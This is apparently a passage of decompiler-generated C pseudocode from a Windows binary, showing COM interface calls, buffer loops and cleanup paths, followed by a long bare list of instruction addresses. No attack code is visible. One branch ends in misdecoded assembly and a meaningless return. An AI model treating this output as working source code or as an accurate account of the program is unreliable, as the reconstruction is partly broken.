								__eflags =  *((intOrPtr*)(_t849 - 0x3c)) - _t673;
								 *(_t849 + 0x10) = _t673;
								 *(_t849 - 0x40) = _t673;
								 *(_t849 - 0x1c) = _t673;
								if( *((intOrPtr*)(_t849 - 0x3c)) <= _t673) {
									L125:
									E004241A3(_t849 - 0x108,  *((intOrPtr*)( *((intOrPtr*)(_t849 - 0xc0)))), _t849 - 0x7c, _t849 - 0x120);
									__eflags = _t828[0x1a] - _t673;
									if(_t828[0x1a] != _t673) {
										 *((intOrPtr*)(_t828[0x1b] + 0x70)) =  *((intOrPtr*)(_t849 - 0x7c));
									}
									__eflags =  *((intOrPtr*)(_t849 - 0x3c)) - _t673;
									if( *((intOrPtr*)(_t849 - 0x3c)) != _t673) {
										E00404AD0(_t849 - 0x11c, 4);
										 *((intOrPtr*)(_t849 - 0x11c)) = 0x47b1f8;
										 *(_t849 - 4) = 0x2a;
										E0040867E(_t849 - 0x11c,  *((intOrPtr*)(_t849 - 0x30)));
										_t837 = 0;
										__eflags =  *((intOrPtr*)(_t849 - 0x30)) - _t673;
										if( *((intOrPtr*)(_t849 - 0x30)) > _t673) {
											do {
												E00415C6D(_t849 - 0x11c,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t849 - 0x2c)) + _t837 * 4)))));
												_t837 = _t837 + 1;
												__eflags = _t837 -  *((intOrPtr*)(_t849 - 0x30));
											} while (_t837 <  *((intOrPtr*)(_t849 - 0x30)));
										}
										 *((intOrPtr*)(_t849 - 0x78)) =  *((intOrPtr*)(_t849 + 0x1c));
										_t494 = _t828[0x1d];
										_t838 =  *((intOrPtr*)( *_t494 + 0xc))(_t494,  *((intOrPtr*)(_t849 - 0x110)), _t673,  *((intOrPtr*)(_t849 - 0x30)), _t849 - 0x78, _t673, 1,  *((intOrPtr*)(_t849 + 0x20)));
										 *(_t849 - 4) = 5;
										E00408604(_t849 - 0x11c);
										 *(_t849 - 4) = 1;
										E004272DB(_t849 - 0x108, __eflags);
										 *(_t849 - 4) = _t673;
										E00427310(_t849 - 0x5c);
										_t462 = _t849 - 4;
										 *_t462 =  *(_t849 - 4) | 0xffffffff;
										__eflags =  *_t462;
										E0042434D(_t849 - 0x38);
										goto L133;
									} else {
										 *(_t849 - 4) = 0x28;
										E00408604(_t849 - 0xb8);
										 *(_t849 - 4) = 1;
										E00423635(_t849 - 0x108, __eflags);
										 *(_t849 - 4) = _t673;
										DeleteCriticalSection(_t849 - 0x58);
										E0043361B(_t849 - 0x5c);
										 *((intOrPtr*)(_t849 - 0x38)) = 0x47b208;
										 *(_t849 - 4) = 0x29;
										L129:
										E0040862D();
										 *(_t849 - 4) =  *(_t849 - 4) | 0xffffffff;
										E00408604(_t849 - 0x38);
										_t469 = _t673;
									}
								} else {
									 *(_t849 - 0x10) = _t673;
									do {
										 *(_t849 + 8) = _t673;
										 *(_t849 - 0x20) =  *( *((intOrPtr*)( *((intOrPtr*)(_t849 + 0x18)) + 0xc)) +  *(_t849 - 0x1c) * 4);
										_t839 =  *((intOrPtr*)( *(_t849 - 0x10) + _t828[0x21]));
										_t514 =  *_t839;
										 *(_t849 - 4) = 0x12;
										 *((intOrPtr*)( *_t514))(_t514, 0x47a528, _t849 + 8);
										_t516 =  *(_t849 + 8);
										__eflags = _t516 - _t673;
										if(_t516 == _t673) {
											L48:
											__eflags = _t516 - _t673;
											 *(_t849 - 4) = 5;
											if(_t516 != _t673) {
												 *((intOrPtr*)( *_t516 + 8))(_t516);
											}
											__eflags =  *((intOrPtr*)(_t849 + 0x2c)) - _t673;
											if( *((intOrPtr*)(_t849 + 0x2c)) == _t673) {
												L56:
												 *(_t849 - 0x24) = _t673;
												_t840 =  *_t839;
												 *(_t849 - 4) = 0x1a;
												 *((intOrPtr*)( *_t840))(_t840, 0x47a478, _t849 - 0x24);
												_t519 =  *(_t849 - 0x24);
												__eflags = _t519 - _t673;
												if(_t519 == _t673) {
													L63:
													__eflags = _t519 - _t673;
													 *(_t849 - 4) = 5;
													if(_t519 != _t673) {
														 *((intOrPtr*)( *_t519 + 8))(_t519);
													}
													_t520 =  *(_t849 - 0x20);
													 *(_t849 - 0x10) =  *(_t849 - 0x10) + 4;
													 *(_t849 - 0x14) =  *(_t520 + 0x14);
													 *(_t849 + 8) =  *(_t520 + 0x18);
													E00404AD0(_t849 - 0x90, 4);
													 *((intOrPtr*)(_t849 - 0x90)) = 0x47b1d4;
													 *(_t849 - 4) = 0x24;
													E00404AD0(_t849 - 0xa4, 4);
													 *((intOrPtr*)(_t849 - 0xa4)) = 0x47b1d4;
													 *(_t849 - 4) = 0x25;
													E0040867E(_t849 - 0x90,  *(_t849 - 0x14));
													_t525 = E0040867E(_t849 - 0xa4,  *(_t849 + 8));
													__eflags =  *(_t849 + 8) - _t673;
													if( *(_t849 + 8) <= _t673) {
														_t842 =  *((intOrPtr*)(_t849 + 0x18));
													} else {
														_t842 =  *((intOrPtr*)(_t849 + 0x18));
														do {
															_t525 = E00415C6D(_t849 - 0xa4,  *(_t842 + 0x48) +  *(_t849 - 0x40) * 8);
															 *(_t849 - 0x40) =  *(_t849 - 0x40) + 1;
															_t220 = _t849 + 8;
															 *_t220 =  *(_t849 + 8) - 1;
															__eflags =  *_t220;
														} while ( *_t220 != 0);
													}
													__eflags =  *(_t849 - 0x14) - _t673;
													 *(_t849 - 0x20) = _t673;
													if( *(_t849 - 0x14) > _t673) {
														do {
															_t714 =  *((intOrPtr*)(_t842 + 0x1c));
															 *(_t849 + 8) = _t673;
															__eflags = _t714 - _t673;
															if(_t714 <= _t673) {
																L90:
																_t530 = _t525 | 0xffffffff;
																__eflags = _t530;
															} else {
																_t542 =  *((intOrPtr*)(_t842 + 0x20));
																while(1) {
																	__eflags =  *_t542 -  *(_t849 + 0x10);
																	if( *_t542 ==  *(_t849 + 0x10)) {
																		break;
																	}
																	 *(_t849 + 8) =  *(_t849 + 8) + 1;
																	_t542 = _t542 + 8;
																	__eflags =  *(_t849 + 8) - _t714;
																	if( *(_t849 + 8) < _t714) {
																		continue;
																	} else {
																		goto L90;
																	}
																	goto L91;
																}
																_t530 =  *(_t849 + 8);
															}
															L91:
															__eflags = _t530 - _t673;
															if(_t530 < _t673) {
																_t715 =  *((intOrPtr*)(_t842 + 0x30));
																 *(_t849 + 8) = _t673;
																__eflags = _t715 - _t673;
																if(_t715 <= _t673) {
																	L98:
																	_t531 = _t530 | 0xffffffff;
																	__eflags = _t531;
																} else {
																	_t543 =  *((intOrPtr*)(_t842 + 0x34));
																	while(1) {
																		__eflags =  *_t543 -  *(_t849 + 0x10);
																		if( *_t543 ==  *(_t849 + 0x10)) {
																			break;
																		}
																		 *(_t849 + 8) =  *(_t849 + 8) + 1;
																		_t543 = _t543 + 4;
																		__eflags =  *(_t849 + 8) - _t715;
																		if( *(_t849 + 8) < _t715) {
																			continue;
																		} else {
																			goto L98;
																		}
																		goto L99;
																	}
																	_t531 =  *(_t849 + 8);
																}
																L99:
																__eflags = _t531 - _t673;
																if(_t531 < _t673) {
																	 *(_t849 - 4) = 0x24;
																	E00408604(_t849 - 0xa4);
																	 *(_t849 - 4) = 5;
																	E00408604(_t849 - 0x90);
																	 *(_t849 - 4) = 0x26;
																	E00408604(_t849 - 0xb8);
																	 *(_t849 - 4) = 1;
																	E00423635(_t849 - 0x108, __eflags);
																	 *(_t849 - 4) = _t673;
																	DeleteCriticalSection(_t849 - 0x58);
																	E0043361B(_t849 - 0x5c);
																	 *((intOrPtr*)(_t849 - 0x38)) = 0x47b208;
																	 *(_t849 - 4) = 0x27;
																	E0040862D();
																	 *(_t849 - 4) =  *(_t849 - 4) | 0xffffffff;
																	E00408604(_t849 - 0x38);
																	_t469 = 0x80004005;
																} else {
																	_t723 =  *(_t849 + 0x14);
																	goto L101;
																}
															} else {
																_t531 =  *( *((intOrPtr*)(_t842 + 0x20)) + 4 + _t530 * 8);
																_t723 =  *(_t842 + 0x48);
																goto L101;
															}
															goto L134;
															L101:
															E00415C6D(_t849 - 0x90, _t723 + _t531 * 8);
															 *(_t849 - 0x20) =  *(_t849 - 0x20) + 1;
															 *(_t849 + 0x10) =  *(_t849 + 0x10) + 1;
															_t525 =  *(_t849 - 0x20);
															__eflags = _t525 -  *(_t849 - 0x14);
														} while (_t525 <  *(_t849 - 0x14));
													}
													goto L102;
												} else {
													_t729 =  *((intOrPtr*)(_t849 + 0x24));
													__eflags = _t729 - _t673;
													if(_t729 == _t673) {
														__eflags = _t519 - _t673;
														 *(_t849 - 4) = 5;
														if(_t519 != _t673) {
															 *((intOrPtr*)( *_t519 + 8))(_t519);
														}
														 *(_t849 - 4) = 0x1b;
														E00408604(_t849 - 0xb8);
														 *(_t849 - 4) = 1;
														E00423635(_t849 - 0x108, __eflags);
														 *(_t849 - 4) = _t673;
														DeleteCriticalSection(_t849 - 0x58);
														E0043361B(_t849 - 0x5c);
														 *((intOrPtr*)(_t849 - 0x38)) = 0x47b208;
														 *(_t849 - 4) = 0x1c;
														_t838 = 0x80004005;
														goto L123;
													} else {
														 *(_t849 - 0x18) = _t673;
														 *(_t849 - 4) = 0x1d;
														_t838 =  *((intOrPtr*)( *_t729 + 0xc))(_t729, _t849 - 0x18);
														__eflags = _t838 - _t673;
														if(_t838 != _t673) {
															__imp__#6( *(_t849 - 0x18));
															_t557 =  *(_t849 - 0x24);
															 *(_t849 - 4) = 5;
															__eflags = _t557 - _t673;
															if(_t557 != _t673) {
																 *((intOrPtr*)( *_t557 + 8))(_t557);
															}
															 *(_t849 - 4) = 0x1e;
															E00408604(_t849 - 0xb8);
															 *(_t849 - 4) = 1;
															E00423635(_t849 - 0x108, __eflags);
															 *(_t849 - 4) = _t673;
															DeleteCriticalSection(_t849 - 0x58);
															E0043361B(_t849 - 0x5c);
															 *((intOrPtr*)(_t849 - 0x38)) = 0x47b208;
															 *(_t849 - 4) = 0x1f;
															goto L123;
														} else {
															 *(_t849 - 0x64) = _t673;
															 *(_t849 - 0x60) = _t673;
															 *((intOrPtr*)(_t849 - 0x68)) = 0x47a7ec;
															 *(_t849 - 4) = 0x20;
															 *((char*)( *((intOrPtr*)(_t849 + 0x28)))) = 1;
															E00403532(_t849 - 0x74,  *(_t849 - 0x18));
															 *(_t849 - 4) = 0x21;
															_t845 =  *((intOrPtr*)(_t849 - 0x70)) +  *((intOrPtr*)(_t849 - 0x70));
															E0040FA26(_t849 - 0x68, _t845);
															__eflags =  *((intOrPtr*)(_t849 - 0x70)) - _t673;
															 *(_t849 + 8) = _t673;
															if( *((intOrPtr*)(_t849 - 0x70)) > _t673) {
																do {
																	_t580 =  *(_t849 + 8) +  *(_t849 + 8);
																	_t752 =  *((intOrPtr*)(_t580 +  *((intOrPtr*)(_t849 - 0x74))));
																	 *((char*)( *(_t849 - 0x60) + _t580)) = _t752;
																	 *(_t849 + 8) =  *(_t849 + 8) + 1;
																	 *((char*)( *(_t849 - 0x60) + _t580 + 1)) = _t752;
																	__eflags =  *(_t849 + 8) -  *((intOrPtr*)(_t849 - 0x70));
																} while ( *(_t849 + 8) <  *((intOrPtr*)(_t849 - 0x70)));
															}
															_t567 =  *(_t849 - 0x24);
															_t568 =  *((intOrPtr*)( *_t567 + 0xc))(_t567,  *(_t849 - 0x60), _t845);
															_push( *((intOrPtr*)(_t849 - 0x74)));
															_t838 = _t568;
															__eflags = _t838 - _t673;
															if(_t838 != _t673) {
																E00407A18();
																 *((intOrPtr*)(_t849 - 0x68)) = 0x47a7ec;
																E00407A18( *(_t849 - 0x60));
																__imp__#6( *(_t849 - 0x18));
																_t571 =  *(_t849 - 0x24);
																 *(_t849 - 4) = 5;
																__eflags = _t571 - _t673;
																if(_t571 != _t673) {
																	 *((intOrPtr*)( *_t571 + 8))(_t571);
																}
																 *(_t849 - 4) = 0x22;
																E00408604(_t849 - 0xb8);
																 *(_t849 - 4) = 1;
																E00423635(_t849 - 0x108, __eflags);
																 *(_t849 - 4) = _t673;
																DeleteCriticalSection(_t849 - 0x58);
																E0043361B(_t849 - 0x5c);
																 *((intOrPtr*)(_t849 - 0x38)) = 0x47b208;
																 *(_t849 - 4) = 0x23;
																goto L123;
															} else {
																E00407A18();
																 *((intOrPtr*)(_t849 - 0x68)) = 0x47a7ec;
																E00407A18( *(_t849 - 0x60));
																__imp__#6( *(_t849 - 0x18));
																_t519 =  *(_t849 - 0x24);
																goto L63;
															}
														}
													}
												}
											} else {
												 *(_t849 + 8) = _t673;
												_t582 =  *_t839;
												 *(_t849 - 4) = 0x17;
												 *((intOrPtr*)( *_t582))(_t582, 0x47a4f8, _t849 + 8);
												_t584 =  *(_t849 + 8);
												__eflags = _t584 - _t673;
												if(_t584 == _t673) {
													L54:
													__eflags = _t584 - _t673;
													 *(_t849 - 4) = 5;
													if(_t584 != _t673) {
														 *((intOrPtr*)( *_t584 + 8))(_t584);
													}
													goto L56;
												} else {
													_t586 =  *((intOrPtr*)( *_t584 + 0xc))(_t584,  *((intOrPtr*)(_t849 + 0x30)));
													__eflags = _t586 - _t673;
													 *(_t849 - 0x14) = _t586;
													if(_t586 != _t673) {
														_t587 =  *(_t849 + 8);
														 *(_t849 - 4) = 5;
														__eflags = _t587 - _t673;
														if(_t587 != _t673) {
															 *((intOrPtr*)( *_t587 + 8))(_t587);
														}
														 *(_t849 - 4) = 0x18;
														E00408604(_t849 - 0xb8);
														 *(_t849 - 4) = 1;
														E00423635(_t849 - 0x108, __eflags);
														 *(_t849 - 4) = _t673;
														DeleteCriticalSection(_t849 - 0x58);
														E0043361B(_t849 - 0x5c);
														 *((intOrPtr*)(_t849 - 0x38)) = 0x47b208;
														 *(_t849 - 4) = 0x19;
														E0040862D();
														 *(_t849 - 4) =  *(_t849 - 4) | 0xffffffff;
														E00408604(_t849 - 0x38);
														_t469 =  *(_t849 - 0x14);
													} else {
														_t584 =  *(_t849 + 8);
														goto L54;
													}
												}
											}
										} else {
											_t765 =  *( *(_t849 - 0x20) + 0xc);
											__eflags = _t765 - 0xffffffff;
											 *(_t849 - 0x14) = _t765;
											if(_t765 > 0xffffffff) {
												__eflags = _t516 - _t673;
												 *(_t849 - 4) = 5;
												if(_t516 != _t673) {
													 *((intOrPtr*)( *_t516 + 8))(_t516);
												}
												 *(_t849 - 4) = 0x13;
												E00408604(_t849 - 0xb8);
												 *(_t849 - 4) = 1;
												E00423635(_t849 - 0x108, __eflags);
												 *(_t849 - 4) = _t673;
												DeleteCriticalSection(_t849 - 0x58);
												E0043361B(_t849 - 0x5c);
												 *((intOrPtr*)(_t849 - 0x38)) = 0x47b208;
												 *(_t849 - 4) = 0x14;
												L79:
												_t838 = 0x80004001;
												goto L123;
											} else {
												_t601 =  *((intOrPtr*)( *_t516 + 0xc))(_t516,  *((intOrPtr*)( *(_t849 - 0x20) + 0x10)),  *(_t849 - 0x14));
												__eflags = _t601 - _t673;
												 *(_t849 - 0x14) = _t601;
												if(_t601 != _t673) {
													_t602 =  *(_t849 + 8);
													 *(_t849 - 4) = 5;
													__eflags = _t602 - _t673;
													if(_t602 != _t673) {
														 *((intOrPtr*)( *_t602 + 8))(_t602);
													}
													 *(_t849 - 4) = 0x15;
													E00408604(_t849 - 0xb8);
													 *(_t849 - 4) = 1;
													E00423635(_t849 - 0x108, __eflags);
													 *(_t849 - 4) = _t673;
													DeleteCriticalSection(_t849 - 0x58);
													E0043361B(_t849 - 0x5c);
													 *((intOrPtr*)(_t849 - 0x38)) = 0x47b208;
													_t838 =  *(_t849 - 0x14);
													 *(_t849 - 4) = 0x16;
													L123:
													E0040862D();
													 *(_t849 - 4) =  *(_t849 - 4) | 0xffffffff;
													E00408604(_t849 - 0x38);
													L133:
													_t469 = _t838;
												} else {
													_t516 =  *(_t849 + 8);
													goto L48;
												}
											}
										}
										goto L134;
										L102:
										_t843 =  *(_t849 - 0x1c);
										 *((intOrPtr*)( *(_t828[0x1c]) + 8))(_t843,  *((intOrPtr*)(_t849 - 0x84)),  *((intOrPtr*)(_t849 - 0x98)));
										 *(_t849 - 4) = 0x24;
										E00408604(_t849 - 0xa4);
										 *(_t849 - 4) = 5;
										E00408604(_t849 - 0x90);
										_t844 = _t843 + 1;
										__eflags = _t844 -  *((intOrPtr*)(_t849 - 0x3c));
										 *(_t849 - 0x1c) = _t844;
									} while (_t844 <  *((intOrPtr*)(_t849 - 0x3c)));
									goto L125;
								}
							} else {
								goto L12;
							}
						}
						L134:
						 *[fs:0x0] =  *((intOrPtr*)(_t849 - 0xc));
						return _t469;
					} else {
						_t847 =  *(_t849 + 0x14);
						 *(_t849 + 8) = _t847;
						_push(0x18);
						_t661 = E004079F2();
						if(_t661 == 0) {
							_t830 = 0;
							__eflags = 0;
						} else {
							 *((intOrPtr*)(_t661 + 4)) = 0;
							 *_t661 = 0x47b228;
							_t830 = _t661;
						}
						 *(_t849 - 0x40) = _t830;
						if(_t830 != _t673) {
							 *((intOrPtr*)( *_t830 + 4))(_t830);
						}
						_push(0x28);
						 *((intOrPtr*)(_t830 + 8)) = _t849 - 0x5c;
						 *((intOrPtr*)(_t830 + 0x10)) =  *((intOrPtr*)(_t849 + 0xc));
						 *(_t830 + 0x14) =  *(_t849 + 0x10);
						_t665 =  *_t847;
						 *((intOrPtr*)(_t849 + 0xc)) =  *((intOrPtr*)(_t849 + 0xc)) + _t665;
						asm("cld");
						asm("adc al, ch");
						return (_t665 | 0x0000008b) + 0x000000c6 ^ 0x3bfffe14;
					}
				}
			}


































































                                                                      0x004264fc
                                                                      0x00426509
                                                                      0x0042650d
                                                                      0x00426511
                                                                      0x0042651b
                                                                      0x00426bfc
                                                                      0x00426bfc
                                                                      0x00000000
                                                                      0x00426521
                                                                      0x00426524
                                                                      0x00426529
                                                                      0x0042652b
                                                                      0x00426530
                                                                      0x0042653a
                                                                      0x0042653d
                                                                      0x00426540
                                                                      0x0042654b
                                                                      0x0042654f
                                                                      0x00426557
                                                                      0x0042655c
                                                                      0x00426655
                                                                      0x00426658
                                                                      0x00426663
                                                                      0x00426667
                                                                      0x00426674
                                                                      0x00426678
                                                                      0x0042667d
                                                                      0x0042667f
                                                                      0x0042669e
                                                                      0x004266a1
                                                                      0x004266a6
                                                                      0x004266a9
                                                                      0x004266ac
                                                                      0x004266ae
                                                                      0x004266b3
                                                                      0x004266b6
                                                                      0x004266b6
                                                                      0x004266b8
                                                                      0x004266bb
                                                                      0x004266bd
                                                                      0x004266c2
                                                                      0x004266c8
                                                                      0x004266cb
                                                                      0x004266cd
                                                                      0x004266d1
                                                                      0x004266dc
                                                                      0x004266dc
                                                                      0x004266d3
                                                                      0x004266d5
                                                                      0x004266d5
                                                                      0x004266e1
                                                                      0x004266e5
                                                                      0x004266e8
                                                                      0x004266ed
                                                                      0x004266f0
                                                                      0x004266f2
                                                                      0x004266f9
                                                                      0x004266f9
                                                                      0x004266f4
                                                                      0x004266f4
                                                                      0x004266f4
                                                                      0x004266fb
                                                                      0x004266fb
                                                                      0x0042670c
                                                                      0x0042670e
                                                                      0x00426710
                                                                      0x0042675a
                                                                      0x0042675d
                                                                      0x00426760
                                                                      0x00426843
                                                                      0x0042684d
                                                                      0x00426852
                                                                      0x00000000
                                                                      0x00426766
                                                                      0x00426766
                                                                      0x0042676f
                                                                      0x00426772
                                                                      0x00426775
                                                                      0x00426778
                                                                      0x0042677c
                                                                      0x00426782
                                                                      0x00426786
                                                                      0x00426788
                                                                      0x0042678d
                                                                      0x0042678f
                                                                      0x00426792
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00426798
                                                                      0x0042679b
                                                                      0x0042679f
                                                                      0x004267a3
                                                                      0x004267d1
                                                                      0x004267d1
                                                                      0x004267d4
                                                                      0x00426b96
                                                                      0x00426b99
                                                                      0x00426b9d
                                                                      0x00426b9f
                                                                      0x00426ba4
                                                                      0x00426ba4
                                                                      0x00426bad
                                                                      0x00426bb1
                                                                      0x00426bbc
                                                                      0x00426bc0
                                                                      0x00426bc8
                                                                      0x00426bcc
                                                                      0x00426bd5
                                                                      0x00426bda
                                                                      0x00426be4
                                                                      0x00426beb
                                                                      0x00426bf0
                                                                      0x00426bf0
                                                                      0x00426bf0
                                                                      0x00426bf7
                                                                      0x00000000
                                                                      0x004267da
                                                                      0x004267e0
                                                                      0x004267e5
                                                                      0x004267e8
                                                                      0x004267f0
                                                                      0x004267f0
                                                                      0x00000000
                                                                      0x004267e8
                                                                      0x004267a5
                                                                      0x004267a5
                                                                      0x004267a9
                                                                      0x00000000
                                                                      0x004267ab
                                                                      0x004267ab
                                                                      0x004267ae
                                                                      0x004267b0
                                                                      0x00426b29
                                                                      0x00426b2c
                                                                      0x00426b30
                                                                      0x00426b32
                                                                      0x00426b37
                                                                      0x00426b3a
                                                                      0x00426b3a
                                                                      0x00426b3d
                                                                      0x00426b3f
                                                                      0x00426b43
                                                                      0x00426b48
                                                                      0x00426b48
                                                                      0x00426b51
                                                                      0x00426b55
                                                                      0x00426b60
                                                                      0x00426b64
                                                                      0x00426b6c
                                                                      0x00426b70
                                                                      0x00426b79
                                                                      0x00426b7e
                                                                      0x00426b85
                                                                      0x00000000
                                                                      0x004267b6
                                                                      0x004267ba
                                                                      0x004267bf
                                                                      0x004267c2
                                                                      0x004267ca
                                                                      0x004267ca
                                                                      0x004267f5
                                                                      0x004267fb
                                                                      0x004267fc
                                                                      0x00426801
                                                                      0x00426804
                                                                      0x00426808
                                                                      0x0042680a
                                                                      0x0042680f
                                                                      0x0042680f
                                                                      0x00426812
                                                                      0x00426815
                                                                      0x00426819
                                                                      0x0042681b
                                                                      0x00426820
                                                                      0x00426820
                                                                      0x00426823
                                                                      0x00426826
                                                                      0x0042682a
                                                                      0x0042682c
                                                                      0x00426831
                                                                      0x00426831
                                                                      0x00426834
                                                                      0x0042683a
                                                                      0x0042683d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042683d
                                                                      0x004267b0
                                                                      0x004267a9
                                                                      0x00000000
                                                                      0x004267a3
                                                                      0x00426abe
                                                                      0x00426ac1
                                                                      0x00426ac5
                                                                      0x00426ac7
                                                                      0x00426acc
                                                                      0x00426acc
                                                                      0x00426acf
                                                                      0x00426ad2
                                                                      0x00426ad6
                                                                      0x00426ad8
                                                                      0x00426add
                                                                      0x00426add
                                                                      0x00426ae6
                                                                      0x00426aea
                                                                      0x00426af5
                                                                      0x00426af9
                                                                      0x00426b01
                                                                      0x00426b05
                                                                      0x00426b0e
                                                                      0x00426b13
                                                                      0x00426b1a
                                                                      0x00426b1d
                                                                      0x00000000
                                                                      0x00426b1d
                                                                      0x00426712
                                                                      0x00426718
                                                                      0x0042671c
                                                                      0x00426727
                                                                      0x0042672b
                                                                      0x00426733
                                                                      0x00426737
                                                                      0x00426740
                                                                      0x00426745
                                                                      0x0042674c
                                                                      0x00426753
                                                                      0x00000000
                                                                      0x00426753
                                                                      0x00426681
                                                                      0x0042668a
                                                                      0x00426691
                                                                      0x00426693
                                                                      0x00426693
                                                                      0x00426695
                                                                      0x00426698
                                                                      0x00426855
                                                                      0x0042685a
                                                                      0x0042685d
                                                                      0x00426860
                                                                      0x00426863
                                                                      0x00426866
                                                                      0x00426869
                                                                      0x00426fc4
                                                                      0x00426fdd
                                                                      0x00426fe2
                                                                      0x00426fe5
                                                                      0x00426fed
                                                                      0x00426fed
                                                                      0x00426ff0
                                                                      0x00426ff3
                                                                      0x00427059
                                                                      0x0042705e
                                                                      0x00427071
                                                                      0x00427075
                                                                      0x0042707a
                                                                      0x0042707c
                                                                      0x0042707f
                                                                      0x00427081
                                                                      0x0042708f
                                                                      0x00427094
                                                                      0x00427095
                                                                      0x00427095
                                                                      0x00427081
                                                                      0x004270a3
                                                                      0x004270a6
                                                                      0x004270c3
                                                                      0x004270c5
                                                                      0x004270c9
                                                                      0x004270d4
                                                                      0x004270d8
                                                                      0x004270e0
                                                                      0x004270e3
                                                                      0x004270e8
                                                                      0x004270e8
                                                                      0x004270e8
                                                                      0x004270ef
                                                                      0x00000000
                                                                      0x00426ff5
                                                                      0x00426ffb
                                                                      0x00426fff
                                                                      0x0042700a
                                                                      0x0042700e
                                                                      0x00427016
                                                                      0x0042701a
                                                                      0x00427023
                                                                      0x00427028
                                                                      0x0042702f
                                                                      0x00427036
                                                                      0x00427039
                                                                      0x0042703e
                                                                      0x00427045
                                                                      0x0042704a
                                                                      0x0042704a
                                                                      0x0042686f
                                                                      0x0042686f
                                                                      0x00426872
                                                                      0x00426878
                                                                      0x00426884
                                                                      0x0042688d
                                                                      0x00426890
                                                                      0x0042689e
                                                                      0x004268a2
                                                                      0x004268a4
                                                                      0x004268a7
                                                                      0x004268a9
                                                                      0x004268db
                                                                      0x004268db
                                                                      0x004268dd
                                                                      0x004268e1
                                                                      0x004268e6
                                                                      0x004268e6
                                                                      0x004268e9
                                                                      0x004268ec
                                                                      0x00426931
                                                                      0x00426931
                                                                      0x00426934
                                                                      0x00426942
                                                                      0x00426946
                                                                      0x00426948
                                                                      0x0042694b
                                                                      0x0042694d
                                                                      0x00426a1a
                                                                      0x00426a1a
                                                                      0x00426a1c
                                                                      0x00426a20
                                                                      0x00426a25
                                                                      0x00426a25
                                                                      0x00426a28
                                                                      0x00426a2b
                                                                      0x00426a37
                                                                      0x00426a40
                                                                      0x00426a43
                                                                      0x00426a4d
                                                                      0x00426a5b
                                                                      0x00426a5f
                                                                      0x00426a64
                                                                      0x00426a73
                                                                      0x00426a77
                                                                      0x00426a85
                                                                      0x00426a8a
                                                                      0x00426a8d
                                                                      0x00426c06
                                                                      0x00426a93
                                                                      0x00426a96
                                                                      0x00426a9c
                                                                      0x00426aac
                                                                      0x00426ab1
                                                                      0x00426ab4
                                                                      0x00426ab4
                                                                      0x00426ab4
                                                                      0x00426ab4
                                                                      0x00426ab9
                                                                      0x00426c09
                                                                      0x00426c0c
                                                                      0x00426c0f
                                                                      0x00426c15
                                                                      0x00426c15
                                                                      0x00426c18
                                                                      0x00426c1b
                                                                      0x00426c1d
                                                                      0x00426c34
                                                                      0x00426c34
                                                                      0x00426c34
                                                                      0x00426c1f
                                                                      0x00426c1f
                                                                      0x00426c22
                                                                      0x00426c25
                                                                      0x00426c27
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00426c29
                                                                      0x00426c2c
                                                                      0x00426c2f
                                                                      0x00426c32
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00426c32
                                                                      0x00426c47
                                                                      0x00426c47
                                                                      0x00426c37
                                                                      0x00426c37
                                                                      0x00426c39
                                                                      0x00426c4c
                                                                      0x00426c4f
                                                                      0x00426c52
                                                                      0x00426c54
                                                                      0x00426c6f
                                                                      0x00426c6f
                                                                      0x00426c6f
                                                                      0x00426c56
                                                                      0x00426c56
                                                                      0x00426c59
                                                                      0x00426c5c
                                                                      0x00426c5e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00426c64
                                                                      0x00426c67
                                                                      0x00426c6a
                                                                      0x00426c6d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00426c6d
                                                                      0x00426ce6
                                                                      0x00426ce6
                                                                      0x00426c72
                                                                      0x00426c72
                                                                      0x00426c74
                                                                      0x00426f4d
                                                                      0x00426f51
                                                                      0x00426f5c
                                                                      0x00426f60
                                                                      0x00426f6b
                                                                      0x00426f6f
                                                                      0x00426f7a
                                                                      0x00426f7e
                                                                      0x00426f86
                                                                      0x00426f8a
                                                                      0x00426f93
                                                                      0x00426f98
                                                                      0x00426fa2
                                                                      0x00426fa9
                                                                      0x00426fae
                                                                      0x00426fb5
                                                                      0x00426fba
                                                                      0x00426c7a
                                                                      0x00426c7a
                                                                      0x00000000
                                                                      0x00426c7a
                                                                      0x00426c3b
                                                                      0x00426c3e
                                                                      0x00426c42
                                                                      0x00000000
                                                                      0x00426c42
                                                                      0x00000000
                                                                      0x00426c7d
                                                                      0x00426c87
                                                                      0x00426c8c
                                                                      0x00426c8f
                                                                      0x00426c92
                                                                      0x00426c95
                                                                      0x00426c95
                                                                      0x00426c15
                                                                      0x00000000
                                                                      0x00426953
                                                                      0x00426953
                                                                      0x00426956
                                                                      0x00426958
                                                                      0x00426e07
                                                                      0x00426e09
                                                                      0x00426e0d
                                                                      0x00426e12
                                                                      0x00426e12
                                                                      0x00426e1b
                                                                      0x00426e1f
                                                                      0x00426e2a
                                                                      0x00426e2e
                                                                      0x00426e36
                                                                      0x00426e3a
                                                                      0x00426e43
                                                                      0x00426e48
                                                                      0x00426e4f
                                                                      0x00426e56
                                                                      0x00000000
                                                                      0x0042695e
                                                                      0x0042695e
                                                                      0x00426968
                                                                      0x0042696f
                                                                      0x00426971
                                                                      0x00426973
                                                                      0x00426e63
                                                                      0x00426e69
                                                                      0x00426e6c
                                                                      0x00426e70
                                                                      0x00426e72
                                                                      0x00426e77
                                                                      0x00426e77
                                                                      0x00426e80
                                                                      0x00426e84
                                                                      0x00426e8f
                                                                      0x00426e93
                                                                      0x00426e9b
                                                                      0x00426e9f
                                                                      0x00426ea8
                                                                      0x00426ead
                                                                      0x00426eb4
                                                                      0x00000000
                                                                      0x00426979
                                                                      0x00426979
                                                                      0x0042697c
                                                                      0x0042697f
                                                                      0x0042698f
                                                                      0x00426993
                                                                      0x00426996
                                                                      0x004269a1
                                                                      0x004269a5
                                                                      0x004269a9
                                                                      0x004269ae
                                                                      0x004269b1
                                                                      0x004269b4
                                                                      0x004269b6
                                                                      0x004269bf
                                                                      0x004269c1
                                                                      0x004269c5
                                                                      0x004269ca
                                                                      0x004269d2
                                                                      0x004269d9
                                                                      0x004269d9
                                                                      0x004269b6
                                                                      0x004269de
                                                                      0x004269e8
                                                                      0x004269eb
